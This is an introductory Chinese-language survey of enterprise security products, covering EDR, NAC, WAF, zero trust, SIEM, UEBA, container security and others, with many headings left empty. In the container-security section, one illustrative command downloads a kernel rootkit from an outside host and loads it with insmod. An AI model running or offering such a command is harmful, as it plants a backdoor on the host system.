意在提供一個安全廠商產品清單的概況,來開闊安全圈知識廣度,文中提到的知識簡介和技術框架,僅針對入門用。
Reference:https://www.h3c.com/cn/Products_And_Solution/Proactive_Security/Product_Series/Endpoint_Security/SecCenter_CSAP-ESM/CSAP-ESM/ESM_G/
企業信息系統免遭高級持續性攻擊和敏感數據免遭丟失或竊取已是當務之急,終端計算機是源頭,也是終點。
Reference:https://zhuanlan.zhihu.com/p/392186104
一切圍繞著提升安全能力開展的工作都屬于安全運營。安全建設僅僅是一個開始,只有運營才能有效提升企業安全防御效果。
安全運營整體框架可分為幾個小框架,分別是安全防護框架、安全運維框架、安全驗證框架和安全度量框架。
事件名稱 | |
事件 ID | |
報告日期 | |
影響概述 | 事件影響級別 |
外部影響描述:內部影響描述: | |
系統信息 | |
系統 IP | |
負責人 | |
事件關鍵時間 | |
發現時間 | |
安全初查時間 | |
漏洞修復時間 | |
安全復查時間 | |
事件處置過程 | |
處置過程 | 處置步驟 |
1 | |
2 | |
影響分析 | |
法務影響 | 無 |
業務影響 | 無 |
數據影響 | |
安全風險 | 無 |
其他 | 無 |
原因分析 | |
原因分類 | □ 設備設施 □ 應用系統 □ 人員 □ 流程 □ 外部因素 |
原因分析 | |
后續改進 | |
* ① 驗證安全 Sensor 安全監測功能是否有效; | |
② 驗證安全 Sensor 所產生監測信息到 SIEM 平臺的信息采集是否有效; | |
③ 驗證 SIEM 平臺的安全檢測規則是否有效; | |
④ 驗證告警方式(郵件、短信與可視化 展示平臺)是否有效 | |
* 矩陣式監控,多維度 |
Reference:https://zhuanlan.zhihu.com/p/564398361
what:
端點檢測和響應是一種主動式端點安全解決方案,通過記錄終端與網絡事件(例如用戶,文件,進程,注冊表,內存和網絡事件),并將這些信息本地存儲在端點或集中數據庫。結合已知的攻擊指示器(Indicators of Compromise,IOCs)、行為分析的數據庫來連續搜索數據和機器學習技術來監測任何可能的安全威脅,并對這些安全威脅做出快速響應。還有助于快速調查攻擊范圍,并提供響應能力。
安全模型:
(1)資產發現:定期通過主動掃描、被動發現、手工錄入和人工排查等多種方法收集當前網絡中所有軟硬件資產,包括全網所有的端點資產和在用的軟件名稱、版本,確保整個網絡中沒有安全盲點。
(2)系統加固:定期進行漏洞掃描、補丁修復、安全策略設置和更新端點軟件清單,通過軟件白名單限制未經授權的軟件運行,通過主機防火墻限制未經授權的服務端口開放,并定期檢查和清理內部人員的賬號和授權信息。
(3)威脅檢測:通過端點本地的主機入侵檢測和借助云端威脅情報、異常行為分析、攻擊指示器等方式,針對各類安全威脅,在其發生前、發生中、發生后進行相應的安全檢測動作。
(4)響應取證:針對全網的安全威脅進行可視化展示,能夠針對安全威脅自動化地進行隔離、修復和補救,自動完成安全威脅的調查、分析和取證工作,降低事件響應和取證分析的技術門檻,不需要依賴于外部專家即可完成快速響應和取證分析。
主要技術:
優點與局限性
Reference:https://www.seczure.com/newsinfo/2412136.html
1、U 盤可以實現數據防復制、防拷貝,不同身份使用不同權限
2、U 盤 100% 防病毒,所有數據均通過 api 讀寫
3、所有數據讀寫均有日志,可以通過管理員導出日志審計
4、可提供 U 盤策略修改、日志讀取接口
5、可以綁定公司內網,U 盤離開公司無法打開使用
防拷貝、防復制: 只能在 U 盤內部打開瀏覽,無法復制;不能另存為,不能刪除格式化;無法通過郵件、網絡等方式導出數據。獨立的文件系統為數據提供防病毒保護,且分區保護的特性具備完全杜絕數據拷貝竊取的行為。
防截圖、防錄屏: 禁止截圖、錄屏軟件使用;可設置禁止遠程。
多用戶管理: 通過新建用戶,對不同用戶進行不同的權限設置,可依據資料密級劃分及對應的使用人員去分配優盤及用戶賬號密碼,并為其配置好相應的權限,方便管理,且不易出錯。
可設置自動銷毀: 文件保管人需要對保管的文件進行定期清理時,可在策略管理中配置好使用時間、次數等,超過使用時間或次數時,優盤會自動銷毀所儲存的資料。
可設置綁定臺數: 可以通過綁定電腦 IP 地址的方式,進一步限制普通用戶的使用。
即插即用: 可以隨身攜帶,不需要安裝插件即可使用,無需花費大量時間跟精力對合作方進行使用培訓。
策略名稱 | 策略功能說明 |
普通 U 盤控制 | 對普通 U 盤設置權限為:禁止使用、允許只讀、允許讀寫。 |
啟用 U 盤標簽認證 | 打開安全 U 盤功能 |
認證標簽列表(添加標簽) | 選擇設定的標簽類型;例如標簽 1、標簽 2、標簽 3 三種標簽,分別對應公司內部信息中心、銷售部、辦公室的安全 U 盤設備。比如,針對信息中心的所有客戶端制定一條策略,設置安全 U 盤在信息中心的計算機上的使用權限;設置銷售部、辦公室的安全 U 盤在信息中心計算機上的使用權限;控制權限范圍到數據區(交換區、保密區)。 |
本單位標簽認證失敗 | 本單位標簽,是指安全 U 盤被打上了本單位的標簽 |
外單位標簽認證失敗 | 外單位標簽,是非本單位信息的外單位安全 U 盤 |
軟盤使用控制、光盤使用控制 | 針對 USB 類型的移動存儲設備進行讀寫控制,USB 軟盤、USB 光盤刻錄機等是否可以將數據拷出 |
審計過濾 | 針對特定類型的文件進行審計,不設置此項,程序默認為全部審計 |
登錄交換區后自動殺毒 | 針對!SAFE6 標簽的安全 U 盤插入計算機后自動調用操作系統的殺毒軟件對交換區進行病毒查殺,支持動態添加各廠商的殺毒軟件設置 |
例外判斷 | 針對特定安全 U 盤,如公章系統盤,不進行訪問控制判斷,其他類似,只需要填寫特征文件名即可 |
中間機策略 | 計算機設置過整盤加密策略,此時與外來安全 U 盤進行數據交換時,進行相關的設置 |
定義:
只有合法的用戶、安全的終端才可以接入網絡,隔離非法、不安全的用戶和終端,或者僅允許他們訪問受限的資源。以此來提升整個網絡的安全防護能力。
為什么:
許多重大的安全漏洞往往出現在網絡內部,例如園區內部員工在瀏覽某些網站時,一些間諜軟件、木馬程序等惡意軟件也會不知不覺地被下載到電腦中,并在內網傳播,產生嚴重的安全隱患。因此,在園區網絡中,任何一臺終端的安全狀態(主要是指終端的防病毒能力、補丁級別和系統安全設置)都將直接影響到整個網絡的安全。另外,園區網絡出現大量非法接入和非授權訪問用戶時,也會導致業務系統遭受破壞、關鍵信息資產泄漏的風險。NAC 方案能夠有效的管理網絡訪問權限、及時的更新系統補丁、升級病毒庫,讓管理員更快捷的查找、隔離及修復不安全的終端,滿足園區網絡內部的安全需求。
安全能力:
架構:
Reference:https://cloud.tencent.com/document/product/627/17470 & https://zhuanlan.zhihu.com/p/97396469
Web 應用防火墻可以防止 Web 應用免受各種常見攻擊,比如 SQL 注入,跨站腳本漏洞(XSS)等。WAF 也能夠監測并過濾掉某些可能讓應用遭受 DOS(拒絕服務)攻擊的流量。WAF 會在 HTTP 流量抵達應用服務器之前檢測可疑訪問,同時,它們也能防止從 Web 應用獲取某些未經授權的數據。
功能 | 簡介 |
AI + Web 應用防火墻 | 基于 AI + 規則的 Web 攻擊識別,防繞過、低漏報、低誤報、精準有效防御常見 Web 攻擊,如 SQL 注入、非授權訪問、XSS 跨站腳本、CSRF 跨站請求偽造,Webshell 木馬上傳等 OWASP 定義的十大 Web 安全威脅攻擊 |
0day 漏洞虛擬補丁 | 騰訊安全團隊 7*24 小時監測,主動發現并響應,24 小時內下發高危 Web 漏洞,0day 漏洞防護虛擬補丁,受護用戶無需任何操作即可獲取緊急漏洞、0day 漏洞攻擊防護能力,大大縮短漏洞響應周期 |
網頁防篡改 | 用戶可設置將核心網頁內容緩存云端,并對外發布緩存中的網頁內容,實現網頁替身效果,防止網頁篡改給組織帶來負面影響 |
數據防泄漏 | 通過事前服務器應用隱藏,事中入侵防護及事后敏感數據替換隱藏策略,防止后臺數據庫被黑客竊取 |
CC 攻擊防護 | 智能 CC 防護,綜合源站異常響應情況(超時、響應延遲)和網站行為大數據分析,智能決策生成防御策略。多維度自定義精準訪問控制、配合人機識別和頻率控制等對抗手段,高效過濾垃圾訪問及緩解 CC 攻擊問題 |
爬蟲 BOT 行為管理 | 基于 AI + 規則庫的網頁爬蟲及 BOT 機器人管理,協助企業規避惡意 BOT 行為帶來的站點用戶數據泄露、內容侵權、競爭比價、庫存查取、黑產 SEO、商業策略外泄等業務風險問題 |
API 安全 | 指保護應用程序編程接口(API)不受惡意攻擊或濫用的措施,通過主動學習的方式自動發現業務訪問中存在的 API 接口,幫助用戶快速梳理網絡中的已知與未知 API 資產并進行分類分級,構建 API 畫像清單;同時,基于威脅檢測與數據識別引擎,提供攻擊防護、盜用防護、濫用防護和數據保護等能力。 |
30 線 BGP IP 接入防護 | WAF 支持防護節點 30 線獨享 BGP IP 鏈路接入,節點智能調度,有效解決訪問延遲問題,保障不同城市用戶的站點訪問速度,實現網站訪問速度影響無感知的云 WAF 安全防護部署 |
用戶在 WAF 上添加防護域名并設置回源信息后,WAF 將為防護域名分配唯一的 CNAME 地址。用戶可以通過修改 DNS 解析,將原來的 A 記錄 修改為 CNAME 記錄,并將防護域名流量調度到 WAF 集群。WAF 集群對防護域名進行惡意流量檢測和防護后,將正常流量回源到源站,保護網站安全。
WAF 通過配置域名和騰訊云七層負載均衡(監聽器)集群進行聯動,對經過負載均衡的 HTTP/HTTPS 流量進行旁路威脅檢測和清洗,實現業務轉發和安全防護分離,最大限度減少安全防護對網站業務的影響,保護網站穩定運行。
負載均衡型 WAF 提供兩種流量處理模式:
鏡像模式:通過域名進行關聯,CLB` 鏡像流量到 WAF 集群,WAF 進行旁路檢測和告警,不返回請求可信狀態。
清洗模式:通過域名進行關聯,CLB 鏡像流量到 WAF 集群,WAF 進行旁路檢測和告警,同步請求可信狀態,CLB 集群根據狀態對請求進行攔截或放行處理。
Reference:https://info.support.huawei.com/info-finder/encyclopedia/zh/NGFW.html
Gartner把NGFW看做不同信任級別的網絡之間的一個線速(wire-speed)實時防護設備,能夠對流量執行深度檢測,并阻斷攻擊。Gartner認為,NGFW必須具備以下能力:
防火墻從誕生那一天起,就是緊跟著網絡演進的步伐亦步亦趨的。
包過濾防火墻、狀態檢測防火墻、UTM設備、NGFW發展史
傳統防火墻、UTM設備、NGFW能力對比
Reference:https://zhuanlan.zhihu.com/p/87281219 & https://www.sdnlab.com/24498.html
SD-WAN之前,處理公司網絡流量的主要方法是分支機構通過租用線路與公司數據中心或總公司聯系,通常使用MPLS(它就是在數據流上打標簽,有點像雞毛信,告訴沿路的所有設備:“我是誰,我要去哪里”。)。這種方式約占公司網絡流量的80%,其中WAN路由器是基于硬件的、專有的、昂貴且相對不靈活(部署周期長,排查問題難)。
MPLS專線是一種租用服務,它的所有權是屬于電信運營商的。運營商把專線租給你,然后承諾這條線路的SLA(Service Level Agreement,服務等級協議,包括帶寬、時延、抖動、丟包率等) 能達到什么樣的要求。
問題又來了,你租我租大家租,運營商的物理網絡就這么一張,這么多公司的業務都在上面跑,怎么保證區分和隔離呢?
本地SD-WAN架構:
大家可以看到,整個網絡架構的軀干,其實還是Internet和MPLS專線。但是,在架構之上,多了一個SD-WAN控制器。這個控制器,就是SD-WAN的管理控制核心。 在分公司節點,還有總部節點,多了一些uCPE和vCPE這樣的東西(SD-WAN Edge設備)。
云SD-WAN架構:云SD-WAN架構允許SD-WAN Edge設備連接到基于云的SD-WAN網關。SD-WAN提供實時流量調整、多電路負載平衡、故障轉移以及對云應用程序的訪問。云網關可由各種云提供商應用程序托管,包括Office 365,Salesforce和Dropbox。企業可以通過讓關鍵的基于云的內部實時應用在小型MPLS管道上運行,讓其他應用在公共互聯網上運行來降低成本。
云骨干架構使SD-WAN Edge設備連接到最近的網絡POP點,這時流量將跳到MPLS上,并且還將擁有專線的SLA質量。大多數MPLS管道直接連接到主要的云提供商,這提高了這些應用程序的性能和可靠性。對于那些想要擁有完整SD-WAN架構但仍然擔心寬帶服務質量的公司來說,這種部署方法是可以使用的。該架構將非關鍵應用offload到低成本寬帶網絡中,從而為關鍵業務應用分配了更多帶寬,進而提高了所有應用程序的性能。
Refernce:https://info.support.huawei.com/info-finder/encyclopedia/zh/%E4%B8%8A%E7%BD%91%E8%A1%8C%E4%B8%BA%E7%AE%A1%E7%90%86.html
價值:
主要依賴技術:https://github.com/ntop/nDPI + app identify(應用特征流多模匹配+機器學習+url標簽)+ 策略
Reference:http://www.caict.ac.cn/kxyj/qwfb/ztbg/202308/P020230828402611317149.pdf & https://zhuanlan.zhihu.com/p/382577136
& https://bbs.sangfor.com.cn/forum.php?mod=viewthread&tid=214985
傳統的安全模型通過 “一次驗證+靜態授權” 的方式評估實體風險,而零信任基于 “持續驗證+動態授權” 的模式構筑企業的安全基石。
零信任是應對上述挑戰的重要方法。采用零信任方案可以統一身份管理,構筑身份邊界,實時感知風險,實現動態和細粒度授權。
?
關鍵技術:
SDP(軟件定義邊界技術)-》 SPA (單包授權)
SDP特點:
SPA特點:
單包授權技術可以看作是端口敲門技術的演進,兩者具有相同的目標,但實現方式卻有很大不同。端口敲門使用多個數據包進行敲門,SPA則如名字所示,使用單個數據包進行訪問申請,避免了敲門過程中因丟包等因素引起的失敗。SPA通過將所有必要信息集成在單個數據包(通常為UDP)內來簡化流程。
數據包內信息一般包含:
圖2 單包授權數據包流程
圖3 單包授權過程
SPA運行過程如圖2、圖3所示,在這個簡單的SPA案例中,客戶端將發包時的時間戳(日期、小時、分鐘)、客戶端IP(UDP報頭內)和服務密碼組合在一起,生成哈希值。將哈希值打包成UDP數據包發送到服務器指定敲門端口。服務器根據接收到UDP報頭內時間戳、客戶端IP以及服務器內部存儲的服務密碼生成哈希值,與接收到的哈希值進行對比,如果相同,則為客戶端打開申請訪問的服務端口。服務器將記錄它收到的最后一個有效授權的數據包,以防止攻擊者發送舊的數據包進行重放攻擊如果哈希值不匹配或者與此前收到的有效哈希值相同,則不執行任何操作。
在實際通信中,開源程序Firewall Knock Operator (fwknop),實現了基于UDP的單包授權方案,也支持TCP和ICMP。fwknop通過加密打包用戶名、訪問端口、時間戳等信息,發送到對應敲門端口,服務器識別后開啟訪問端口來實現SPA。
??
Reference:https://pandavpnpro.com/blog/zh-cn/how-does-a-vpn-work & https://info.support.huawei.com/info-finder/encyclopedia/zh/VPN.html
what
虛擬專用網VPN(Virtual Private Network)是依靠Internet服務提供商ISP(Internet Service Provider)和網絡服務提供商NSP(Network Service Provider)在公共網絡中建立的虛擬專用通信網絡,可以滿足企業對網絡的靈活性、安全性、經濟性、擴展性等方面的要求。
兩種模式
正常情況下,當您在瀏覽器輸入你的目標訪問地址 http://youtube.com,那么此信息會瀏覽器發送到協議棧并由其打包成 Packet 并交給正常網卡,進而由網卡把包轉換成電信號通過網線發出去,而這一切都是 ISP、政府等通過真實 IP 地址可見的。有了 VPN 的存在,上面我們有提到,因為整個設備會多出一個 VPN 創建的虛擬網卡,那么原始數據包會由 VPN協議(如 PPTP, OpenVPN)進行重新封裝(IP 頭地址會變成所選 VPN 服務器的所屬地址)并加密,然后通過虛擬網卡進行發送,這樣一來任何第三方都是無法知道你的具體訪問網址和行為。這樣 VPN 的使用,不論從隱私性、安全性還是網絡自由的角度來說,都是益處多多的。當Web 服務器接受處理請求并將目標信息返回時,一切數據依舊是被 VPN 所加密,所以全程保護,無需擔心
遠程訪問 VPN 可用于個人和公司,需要使用客戶端軟件和網關來對某個特定的網絡進行連接。而站點到站點 VPN 是公司級工具,所有位置都會使用同一個共享網關,無需安裝客戶端,通過身份驗證即可輕松連接。
組件:
VPN不是一種簡單的高層業務,它要比普通的點到點應用復雜得多。VPN的實現需要建立用戶之間的網絡互聯,包括建立VPN內部的網絡拓撲、進行路由計算、維護成員的加入與退出等。因此,VPN體系結構較復雜,可以概括為以下三個組成部分:
實現模式:
Reference:https://console1.cloud.inspur.com/document/las/1-service-introduction.html
基于大數據架構的綜合日志管理平臺,通過大數據技術的海量日志采集、異構設備日志范式化及安全事件關聯分析,實現日志全生命周期管理。協助運維人員從事前(發現安全風險)、事中(分析溯源)及事后(調查取證)等多個維度監控網絡安全事件,助力企業滿足《網絡安全法》及等保合規要求。
功能
產品部署
通過Region Boss下單后自動為租戶創建云堡壘機服務實例,通過標準syslog實現日志收集,其中linux系統、網絡產品、安全產品可通過設置syslog日志服務器地址發送日志,windows操作系統需安裝agent進行日志采集。
界面信息:
Reference:https://zhuanlan.zhihu.com/p/269609995
what:
堡壘機,即在一個特定的網絡環境下,為了保障網絡和數據不受來自外部和內部用戶的入侵和破壞,而運用各種技術手段監控和記錄運維人員對網絡內的服務器、網絡設備、安全設備、數據庫等設備的操作行為,以便集中報警、及時處理及審計定責。
用一句話來說,堡壘機就是用來后控制哪些人可以登錄哪些資產(事先防范和事中控制),以及錄像記錄登錄資產后做了什么事情(事溯源)
從跳板機演化而來,更加符合權限可控+行為可控(4A:認證(Authen)、授權(Authorize)、賬號(Account)、審計(Audit))
目標:
組件:
開源版本:jumpserver
Reference:https://cloud.tencent.com/developer/techpedia/1082
數據庫審計是指對數據庫的操作進行跟蹤、記錄、分析和報告的過程。通過數據庫審計,可以監控數據庫的訪問和操作,及時發現并應對安全事件。數據庫審計可以記錄用戶登錄、查詢、修改、刪除等操作,以及操作的時間、地點、來源等信息,以便進行安全審計和監控。
目的:
基本組件
Reference:https://www.freebuf.com/articles/es/197268.html
在大規模網絡環境中對能夠引起網絡態勢發生變化的安全要素進行獲取、理解、顯示以及最近發展趨勢的順延性預測,而最終的目的是要進行決策與行動。
(1)態勢感知是了解當前的狀態,包括狀態識別與確認(攻擊發現),以及對態勢感知所需信息來源和素材的質量評價。
(2)態勢理解則包括了解攻擊的影響、攻擊者(對手)的行為和當前態勢發生的原因及方式。簡單可概括為:損害評估、行為分析(攻擊行為的趨勢與意圖分析)和因果分析(包括溯源分析和取證分析)。
(3)態勢預測則是對態勢發展情況的預測評估,主要包括態勢演化(態勢跟蹤)和影響評估(情境推演)
在傳統的防御思維里,我們會在安全事件發生之后去取證,溯源,可是對客戶造成的損失已經無法彌補,所以我們需要的在事件發生中,甚至發生前去感知到,進一步有針對性地進行防御。
為什么態勢感知平臺可以做到呢?因為平臺背后的專家們能夠在以前的安全事件中溯源獲取經驗,包括各種攻擊手段的特征如可執行文件的行為,異常的流量等;在大量數據中提取出特征,這一工作在大數據相關技術發展之前是很難實現的,而現在可以用大數據的方法處理以前積累起來的數據;可以和其他傳統產品打通接口,通過各種數據多維度地進行準備分析,包括刻畫攻擊者畫像、攻擊路線等。甚至,通過畫像的分析,態勢感知平臺可以分析出攻擊服務器的是一個腳本小子,還是APT組織,如果是腳本小子,那就由他弄好了,也不會造成什么危害,如果是APT,則需要應急響應了。當然這些規則一方面需要專家根據經驗得出,一方面由AI來學習得出。
主流的態勢感知產品支撐技術都是相近的,一般而言,態勢感知產品定位為客戶的安全大腦,是一個檢測、預警、響應處置的大數據安全分析平臺。其以全流量分析為核心,結合威脅情報、行為分析建模、UEBA、失陷主機檢測、圖關聯分析、機器學習、大數據關聯分析、可視化等技術,對全網流量實現全網業務可視化、威脅可視化、攻擊與可疑流量可視化等,幫助客戶在高級威脅入侵之后,損失發生之前及時發現威脅。
全流量分析,是做很多安全產品的基礎工作,因為再高級的攻擊,都會留下網絡痕跡,哪怕做了混淆,或者故意模仿正常訪問,但是在大數據的建模分析下一切都會現身。
為了進行流量分析,首先需要拿到流量。通過旁路鏡像的方法獲取網絡流量,并針對已知網絡協議實時解碼、元數據提取(非常用的或者私有的協議需大量資源進行分析,有時也會由于回話秘鑰的問題無法解開,而且由于出現頻率也不高,很多產品并沒有做這一步),此時可以做兩方面的工作:
一是通過深度的網絡會話關聯分析、數據包解碼分析、載荷內容還原分析、特征分析和日志分析,還原黑客的kill chain,對網絡安全事件進行精準的定性分析,
二是快速提取多維度的網絡元數據進行異常行為建模,為后續異常數據挖掘、分析、取證建立扎實的基礎。分析之后,還要保存起來,方便查詢檢索及關聯回溯分析,實現從線索挖掘到整個攻擊過程的完整復盤,為安全事件的準確響應提供依據。
威脅情報,主要從四個方面判斷質量,相關性,及時性,精確性,決策性,這一塊筆者接觸的也不多,也不清楚我司的產品是如何處理這一塊的,但是如果是我做的話會考慮直接從這一細分領域企業那兒接過來,或者體量較大的乙方自身在業內是有十余年甚至數十年的積累的,也可以選擇開源威脅情報如open-threat-exchange。
UEBA,即用戶實體行為分析,與它常常一起出現的還有SIEM,SoC。先來說下UEBA,主要用于解決以下問題:賬號失陷檢測,主機失陷檢測,數據泄漏檢測,內部用戶濫用,提供事件調查的上下文等。
技術架構一般如上,可見UEBA在第一步是數據驅動的,需要從產品、日志得到支持,然后是規則驅動,接下來是算法驅動,最后才能盡可能準確刻畫出用戶畫像。再說說UEBA和SIEM的關系,SIEM即安全信息及事件管理,主要是提供一種統一的路徑方法來綜合處理數據及關聯分析。由于數據量及復雜度增加,SIEM的管理能力到了天花板,這才有了UEBA。UEBA 為SIEM 數據添加了背景信息和分析,并為實體組織的事件提供風險評分,使分析師能夠確定最高風險的優先級。隨著技術的發展,UEBA又作為子集融合進了態勢感知產品。
可視化,其實是為了方便客戶了解旗下資產安全情況而做的,將一些復雜的數據圖形化使之更容易的感知。可以直觀展示企業在全網范圍內的資產安全狀況、最新待處理威脅、風險事件、安全事件趨勢等,并運用安全評分、趨勢圖、柱狀圖、分布圖等直觀圖形,實現可視化展示。同時結合平臺所收集、加工、分析后的多維數據直觀查看結果,方便安全運維人員及時發現、處理威脅,從而幫助客戶有效洞察企業所面臨的外部威脅和內部脆弱性風險,也極大的提高了安全運維團隊的監測、管理、處置安全事件的效率。
Reference:https://www.topsec.com.cn/products/Grade-protection & https://zhuanlan.zhihu.com/p/259493461?
全名叫做信息安全等級保護,顧名思義就是指根據信息系統在國家安全、社會穩定、經濟秩序和公共利益方便的中重要程度以及風險威脅、安全需求、安全成本等因素,將其劃分不同的安全保護等級并采取相應等級的安全保護技術、管理措施、以保障信息系統安全和信息安全。
可能有點繞,總結下就是:保護互聯網數據的一種標準方法體系,里面規定了方方面面。
1、降低信息安全風險,提高信息系統的安全防護能力;
2、滿足國家相關法律法規和制度的要求;
3、滿足相關主管單位和行業要求;
4、合理地規避或降低風險。
Reference:https://zhuanlan.zhihu.com/p/112789529
云原生的代表技術包括容器、服務網格(Service Mesh)、微服務(Microservice)、不可變基礎設施和聲明式API。更多對于云原生的介紹請參考CNCF/Foundation。
我們再對容器安全做一層抽象,又可以看作構建時安全(Build)、部署時安全(Deployment)、運行時安全(Runtime)。
面對特權容器,在容器內簡單地執行一下命令,就可以輕松地在宿主機上留下后門:
$ wget https://kernfunny.org/backdoor/rootkit.ko && insmod rootkit.ko
Reference:https://help.aliyun.com/zh/security-center/user-guide/baseline-check
基線 檢查功能通過配置不同的基線檢查策略,可以幫助您快速對服務器進行批量掃描,發現包括系統、賬號權限、數據庫、弱口令 、等級保護合規配置等存在的風險點,并提供修復建議和一鍵修復功能。
檢測頁面:
基線內容:
基線分類 | 檢查標準及檢查內容 | 覆蓋的系統和服務 | 修復緊急度說明 |
弱口令 | 使用非登錄爆破方式檢測是否存在弱口令。避免登錄爆破方式鎖定賬戶影響業務的正常運行。說明弱口令檢測是通過讀取HASH值與弱口令字典計算的HASH值進行對比來檢查是否存在弱口令。如果不想讀取HASH值,您可以從基線檢查策略中移除弱口令基線。 | * 操作系統Linux、Windows* 數據庫MySQL、Redis、SQL Server、MongoDB、PostgreSQL、Oracle* 應用Tomcat、FTP、Rsync、SVN、Activemq、RabbitMQ、OpenVpn、Jboss6/7、Jenkins、Openldap、VncServer、pptpd | 需緊急修復。避免弱口令暴露在公網上導致系統被入侵或發生數據泄露事件。 |
未授權訪問 | 未授權訪問基線。檢測服務是否存在未授權訪問風險,避免被入侵或者數據泄露。 | Memcached、Elasticsearch、Docker、CouchDB、Zookeeper、Jenkins、Hadoop、Tomcat、Redis、Jboss、ActiveMQ、RabbitMQ、openLDAP、rsync、Mongodb Postgresql | |
最佳安全實踐 | 阿里云標準基于阿里云最佳安全實踐標準檢測是否存在賬號權限、身份鑒別、密碼策略、訪問控制、安全審計和入侵防范等安全配置風險。 | * 操作系統* CentOS 6、7、8* Redhat 6、7、8* Ubuntu 14、16、18、20* Debian 8、9、10* Aliyun Linux 2、3* Windows 2008R2、2012R2、2016、2019* Rocky Linux 8* Alma Linux 8* SUSE Linux 15* Anolis 8* 麒麟* UOS* 數據庫MySQL、Redis、MongoDB、SQL server、Oracle 11g、CouchDB、Influxdb、PostgreSql* 應用Tomcat、IIS、Nginx、Apache、Windows SMB、RabbitMQ、Activemq、ElasticSearch、Jenkins Hadoop、Jboss6/7、Tomcat | 重要安全加固項,建議修復。基于最佳安全實踐的加固標準,降低配置弱點被攻擊和配置變更風險。 |
容器安全 | 阿里云標準基于阿里云容器最佳安全實踐的Kubernetes Master和Node節點配置風險檢查。 | * Docker* Kubernetes集群 | |
等保合規 | 等保二級、三級合規基于服務器安全等保基線檢查。對標權威測評機構安全計算環境測評標準和要求。 | * 操作系統* CentOS 6、7、8* Redhat 6、7、8* Ubuntu 14、16、18、20* SUSE 10、11、12、15* Debian 8、9、10* Aliyun Linux 2、3* Windows 2008R2、2012R2、2016、2019* Anolis 8* 麒麟* UOS* 數據庫Redis、MongoDB、PostgreSql、Oracle、MySql、SQL Server、Informix* 應用Websphere Application Server、Jboss6/7、Nginx、Weblogic、Bind、IIS | 基于業務是否有合規需要進行修復。 |
CIS合規 | 基于CIS標準的操作系統安全基線檢查。 | * CentOS 6、7、8* Ubuntu 14、16、18、20* Debian 8、9、10* Aliyun Linux 2* Windows 2008R2、2012R2、2016、2019 | 基于業務是否有合規需要進行修復。 |
自定義基線 | 支持CentOS Linux 7自定義基線,可對基線檢查策略中的檢查項進行編輯,自定義安全加固項。 | CentOS 7、CentOS6、Windows 2008R2、2012R2、2016、2019 | 用戶自定義的安全加固項,建議修復。基于最佳安全實踐的加固標準,降低配置弱點被攻擊和配置變更風險。 |
20. DLP
Reference:https://www.zhihu.com/question/525751865/answer/2463294132
沙箱技術云上部署,可以向他投遞文件或者url
只消一兩分鐘,我就能答復:它是不是惡意文件,是不是釣魚、帶毒網站,是不是跟某個黑客團伙有關聯……
檢測手段:
Reference:https://info.support.huawei.com/info-finder/encyclopedia/zh/UEBA.html
從UEBA的概念可以看出,UEBA技術不僅檢測人的異常行為,也檢測實體的異常行為,我們先通過2個例子來直觀地感受一下UEBA的功能。
例如,某企業職員每天的工作時間段是早8點到晚5點,外發的文件數量為幾十個,總大小也不超過100MB。但是有一天該職員突然工作到晚上11點,外發文件大小超過100GB,UEBA就會認為這是異常行為,并發出告警信息。如果網絡中部署了自動響應與處置類的功能,還可以自動隔離該職員的辦公設備,令其無法聯網,并鎖定該職員的所有賬號權限,等待運維人員處理完異常后再重新開放權限。
相較于人的異常行為,實體的異常行為往往并不容易發現,甚至發現了也會被忽略。例如,某企業的服務器對外提供服務,一般凌晨時段的訪問請求非常少,但是某天凌晨的訪問請求突然增多,且該服務器開始與網絡內的其他服務器進行文件傳輸,這大概率會觸發UEBA的告警。如果沒有UEBA,由于傳統安全設備主要關注網絡邊界的安全性,所以該服務器的異常行為并不會觸發告警,也不會被攔截,這為企業的網絡安全埋下了巨大隱患。
UEBA利用人工智能和機器學習算法來檢測網絡中的用戶和實體的異常行為。首先,UEBA收集有關用戶和實體活動的數據,通過分析數據來建立用戶和實體的行為模式基線。然后,UEBA會持續監控用戶和實體行為,并將其當前行為與基線行為進行比較,計算風險評分,確定行為偏差是否可接受。如果風險評分超過一定的閾值,UEBA會實時向用戶發出告警。
風險評分是基于威脅的嚴重和緊急程度等因素評定的,可以幫助運維人員識別最優先處理的威脅,提高威脅的處置效率。例如,用戶多次登錄失敗,可以生成一個較低的風險評分;而用戶向外發送超過10GB的文件,且其中很多文件的名稱命中了敏感字,這就應該生成一個較高的風險評分。
為了保證生成基線的準確性,UEBA會從盡可能多的來源中獲取數據,通常包括:
生成基線后,UEBA在識別內部威脅方面特別有效,而這類威脅往往是很難檢測出來的。試想一下,當攻擊者獲取了企業職員的賬戶權限,或者企業內部的職員心存惡念,他們都在使用正常的權限去做壞事,完全不借助惡意軟件。這怎么能被發現呢?此時就體現了UEBA的價值,因為攻擊者或企業職員在實施惡意行為的時候,必然會偏離正常的行為基線。例如,攻擊者或企業職員想竊取企業內部的關鍵數據,那么就要訪問高密級的系統或文件,而這個行為在UEBA中可能會被賦予很高的風險評分,當UEBA發現此異常行為后就會立即生成告警。
Reference:https://www.zhihu.com/question/498644721/answer/3015102374
SIEM是安全信息管理(SIM)和安全事件管理(SEM)的結合體。它從各種安全設備收集信息,監視和分析這些信息,然后以對企業有意義的方式呈現結果。SIEM的核心功能包括跟蹤、日志記錄、收集和管理安全數據以符合合規或審計目的,包括報告、數據聚合、安全監測和用戶活動監測等操作功能:
最佳實踐:
Reference:https://www.jsjkx.com/CN/article/openArticlePDF.jsp?id=17726
匿名通信和跳板技術與手段的使用給攻擊源追蹤、 網絡監管和攻擊取證等帶來嚴峻挑戰 。相對于傳統的被動流量分析而言 ,網絡流水印 (NetworkFlowWatermarking) 作為一種主動流量分析手段 ,可用于追蹤通過跳板鏈進行的網絡攻擊源或采取匿名通道進行非法通信的惡意用戶。通過向發送者的發送流量中主動添加水印 (Watermark)來幫助確認發送者和接收者的通信關系,網絡流水印技術具有準確率高、誤報率低、觀測時間短和所需觀測數據包數量少等優點
技術:
改變或調制發送端數據包的載荷 (Payload)、時間間隔(Interva1)、間隔到達時延 (Inter-PacketDelay,IPD)和 間隔重心 (ItervalCentroid)等信息或流量速率 (TrafficRate)來嵌入水印 ,在接收端識別該水印 ,以達到關聯發送者和接收者關系的目的
